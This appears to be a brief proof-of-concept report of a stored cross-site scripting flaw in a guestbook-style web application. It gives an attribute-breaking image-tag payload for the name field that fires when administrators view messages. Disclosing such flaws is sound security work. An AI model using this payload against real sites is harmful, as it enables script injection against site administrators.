1. The attacker opens http://127.0.0.1/book/, and enters the following at the name.
"><img src=1 onerror=alert(location.href)>
2.The vulnerability is triggered when administrators view messages.
